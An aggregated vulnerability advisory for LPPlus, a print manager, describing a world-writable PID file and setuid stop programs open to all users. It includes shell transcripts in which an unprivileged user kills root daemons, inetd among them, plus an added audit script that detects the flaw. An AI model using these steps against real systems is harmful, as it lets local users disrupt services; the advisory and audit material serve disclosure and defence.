Published: 2000-11-14 00:00:00
Revised: 2008-09-05 16:22:06

[Original] LPPlus creates the lpdprocess file with world-writeable permissions, which allows local users to kill arbitrary processes by specifying an alternate process ID and using the setuid dcclpdshut program to kill the process that was specified in the lpdprocess file.


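        LPPlus creates the lpdprocess file with world-writable permissions. A local user can terminate arbitrary processes by specifying an alternate process ID and using the setuid dcclpdshut program to terminate the process named in the lpdprocess file.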

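- CVSS (base score)

CVSS score: 3.6 [LOW]
Confidentiality impact: NONE [no impact on the confidentiality of the system]
Integrity impact: PARTIAL [may allow system files to be modified]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]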

- CPE (affected platforms and products)


- OVAL (technical details for detection)


- Official database links
(Official data source) MITRE
(Official data source) NVD
(Official data source) CNNVD

- Other links and resources
(UNKNOWN)  XF  lpplus-process-perms-dos
(VENDOR_ADVISORY)  BUGTRAQ  20000906 Multiple Security Holes in LPPlus

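- Vulnerability information

Low risk    Access validation error
2000-11-14 00:00:00 2005-10-20 00:00:00
        LPPlus creates the lpdprocess file with world-writable permissions. A local user can terminate arbitrary processes by specifying an alternate process ID and using the setuid dcclpdshut program to terminate the process named in the lpdprocess file.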

- Advisories and patches

        Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at:

- Vulnerability information (20192)

LPPlus 3.2.2/3.3 Permissions DoS Vulnerabilities (EDBID:20192)
unix local
2000-09-06 Verified
0 Dixie Flatline
N/A

Vulnerability #1: Several files that are part of the LPPlus print management system are installed setuid root by default. These files include:


These start the scheduler, LPD server and network status daemons.


These stop the same services.

By default, all six may be run by a user of any privilege level, allowing any user to start and stop printing services, regardless of userid or group.

Vulnerability #2: $LPHOME/system/lpdprocess is created mode 777. This file contains the process ID of the dcclpdser process. If a user replaces the PID in $LPHOME/system/lpdprocess with the PID of a target process, then runs $LPHOME/bin/dcclpdshut, the combination of this file's permissions, and the fact that dcclpdshut is executable by any user, allows any user to send signal 2 (SIGINT) to, thereby shutting down, any process.

Vulnerability #1: 

$ id
uid=600(test) gid=300(users)
$ ps -ef|grep dcc
test 26357 26351 0 18:18:06 pts/0 0:00 grep dcc
root 26262 1 0 17:41:50 ? 0:01 /opt/lpplus/bin/dccsched
root 26272 1 0 17:42:03 ? 0:00 /opt/lpplus/bin/dcclpdser
root 26276 1 0 17:42:14 ? 0:00 /opt/lpplus/bin/dccbkst
$ dccbkstshut
$ dcclpdshut
LPD048E Signal sent to dcclpdser to shut down.
$ dccshut
LPP054I LP Plus scheduler ordered to shutdown.
$ ps -ef|grep dcc 
test 26253 26239 0 17:39:45 pts/0 0:00 grep dcc 

Vulnerability #2

$ id
uid=600(test) gid=300(users)
$ ps -ef|grep inet
test 26285 26279 0 17:42:42 pts/0 0:00 grep inet
root 12276 1 0 Aug 22 ? 0:00 /usr/sbin/inetd -s
$ cat > $LPHOME/system/lpdprocess
$ dcclpdshut
LPD048E Signal sent to dcclpdser to shut down.
$ ps -ef|grep inet
test 26291 26279 0 17:45:17 pts/0 0:00 grep inet
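
An added audit example (not part of the original advisory or of LPPlus): it flags the two conditions the advisory describes, a PID file that unprivileged users can rewrite and setuid programs that any user may execute. The function names are hypothetical; only the `$LPHOME/system/lpdprocess` and `$LPHOME/bin` paths come from the advisory.

```shell
#!/bin/sh
# Added audit sketch: the LPHOME layout (system/lpdprocess, bin/) comes from the
# advisory; the function names are hypothetical and not part of LPPlus.

# Succeeds (0) if the path has group- or other-write permission bits set.
is_loosely_writable() {
    [ -n "$(find "$1" -prune \( -perm -020 -o -perm -002 \) -print 2>/dev/null)" ]
}

# Succeeds (0) if unprivileged users could change which PID the file names:
# the file is a symlink, is group/other-writable, or sits in a directory that is.
pidfile_is_tamperable() {
    [ -e "$1" ] || [ -h "$1" ] || return 1      # missing file: nothing to flag
    [ -h "$1" ] && return 0
    is_loosely_writable "$1" && return 0
    is_loosely_writable "$(dirname "$1")"
}

# Prints setuid regular files under a directory that any user may execute.
list_exposed_setuid() {
    find "$1" -type f -perm -4000 -perm -001 -print 2>/dev/null
}

# Reports findings for an LPPlus install root; returns 0 only when clean.
# Usage: audit_lpplus "$LPHOME"
audit_lpplus() {
    findings=0
    if pidfile_is_tamperable "$1/system/lpdprocess"; then
        echo "FINDING: $1/system/lpdprocess can be rewritten by unprivileged users"
        findings=$((findings + 1))
    fi
    exposed=$(list_exposed_setuid "$1/bin")
    if [ -n "$exposed" ]; then
        echo "FINDING: setuid programs executable by any user:"
        echo "$exposed"
        n=$(echo "$exposed" | wc -l)
        findings=$((findings + n))
    fi
    [ "$findings" -eq 0 ]
}
```

A clean result here means the PID file is writable only by its owner and no setuid program in `bin/` is open to every user; whether the remaining setuid programs need that bit at all is a separate review.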

- Vulnerability information

LPPlus lpdprocess File Permission Weakness Arbitrary Process Termination
Local Access Required Denial of Service
Loss of Availability Solution Unknown
Exploit Public Third-party Verified

- Vulnerability description

- Timeline

2000-09-06 Unknown
Unknown Unknown

- Solution

OSVDB is not aware of a solution for this vulnerability.

- Related references

- Vulnerability author

Unknown or Incomplete